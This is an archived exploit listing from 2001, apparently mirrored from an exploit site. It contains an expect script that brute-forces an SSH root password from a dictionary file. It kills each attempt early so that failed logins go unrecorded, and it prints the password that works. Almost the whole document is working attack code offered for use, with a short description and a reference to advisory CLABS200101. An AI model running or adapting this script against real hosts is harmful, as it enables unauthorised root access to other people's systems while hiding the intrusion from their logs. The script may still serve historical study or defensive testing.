Ssh-brute.sh brute force guesses root's password without being logged. See CLABS200101 for more information.
34a2ea4480def21b403c2fd9c6919e2668f38694db9dcdf4b311ad50c963ce9f
#!/usr/bin/expect -f
#
# simple expect exploit to brute force root's password via ssh without
# detection.. see CLABS200101 for info on this exploit.
#
# this is beerware, just buy me a beer at defcon if you like this.
# build your own dictionary, use at your own risk, no warranty, etc.
#
# jose@crimelabs.net january, 2001
#
set timeout 3
set target [lindex $argv 0]
set dictionary [lindex $argv 1]
if {[llength $argv] != 2} {
puts stderr "Usage: $argv0 root@target dictionary\n"
exit }
set tryPass [open $dictionary r]
foreach passwd [split [read $tryPass] "\n"] {
spawn ssh $target
expect ":"
send "$passwd\n"
expect "#" { puts "password is $passwd\n" ; exit }
set id [exp_pid]
exec kill -INT $id
}
# www.hack.co.za [2 March 2001]